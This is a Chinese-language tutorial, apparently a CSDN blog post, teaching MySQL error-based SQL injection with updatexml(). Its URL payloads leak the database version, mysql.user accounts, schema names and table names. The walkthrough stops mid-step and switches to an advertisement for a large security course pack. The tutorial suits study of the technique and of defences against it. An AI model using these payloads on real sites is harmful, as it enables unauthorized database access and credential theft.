?id=1' and updatexml(1,concat(0x7e,version()),3) -- a
页面的报错信息中返回了数据库的版本:
version()
的位置可以替换成其他需要执行的SQL语句。
接下来,我们一步一步的分析,报错注入是怎样在报错信息中显示这些数据的。
二、执行原理
1. 代码逻辑分析
测试网站的功能很简单:根据id查询用户名和名:
执行流程分为三步:
- 用户输入参数(用户id)
- 后台执行SQL(查询用户信息)
- 查询结果在前端回显
明白网站的功能逻辑以后,我们来了解一下报错注入的核心:updatexml()
2. 报错函数
MySQL提供了一个 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。
我们尝试在查询用户id的同时,使用报错函数,在地址栏输入:?id=1' and updatexml(1, 0x7e, 3) -- a
提示:0x7e
等价于 ~
;updatexml() 需要MySQL5.1及以上版本。
参数2包含特殊符号 ~
,触发数据库报错,并将参数2的内容显示在报错信息中。
3. 拼接查询结果
如果我们在参数2的位置,将查询语句和特殊符号拼接在一起,就可以将查询结果显示在报错信息中,在地址栏中输入:
?id=1' and updatexml(1, concat(0x7e,version()), 3) -- a
参数2内容中的查询结果显示在数据库的报错信息中,并回显到页面。
提示:
- version():返回数据库版本
- concat():拼接特殊符号和查询结果,函数使用方式可以参考我的另一篇博客:MySQL concat函数使用详解
4. 长度限制
updatexml() 函数的报错内容长度不能超过32个字符,常用的解决方式有两种:
- limit 分页
- substr()截取字符
4.1 limit 分页
以查询数据库用户为例:
?id=-1' and updatexml(1,concat(0x7e,
(select user
from mysql.user limit 1,1)
),3) -- a
4.2 substr()截取字符
以查询数据库用户为例:
?id=-1' and updatexml(1,concat(0x7e,
substr(
(select group_concat(user)
from mysql.user)
, 1 , 31)
),3) -- a
理解报错注入的执行原理后,我们整理一下报错注入的步骤。
三、步骤总结
适用情况:页面有数据库的报错信息
报错信息必须是动态的、来自数据库的报错信息。
网站写死的、自定义的报错提示不算。
1. 判断是否报错
参数中添加单/双引号,页面报错才可进行下一步。
?id=1' -- a
2. 判断报错条件
参数中添加报错函数,检查报错信息是否正常回显
?id=1' and updatexml(1,'~',3) -- a
3. 脱库
获取所有数据库
?id=-1' and updatexml(1,concat('~',
substr(
(select group_concat(schema_name)
from information_schema.schemata)
, 1 , 31)
),3) -- a
获取所有表
?id=1' and updatexml(1,concat('~',
substr(
(select group\_concat(table\_name)
from information\_schema.tables
where table\_schema = 'security')
, 1 , 31)
),3) -- a
获取所有字段
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。
学习路线图
其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。
相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。
网络安全工具箱
当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。
项目实战
最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!
加入社区》https://bbs.csdn.net/forums/4304bb5a486d4c3ab8389e65ecb71ac0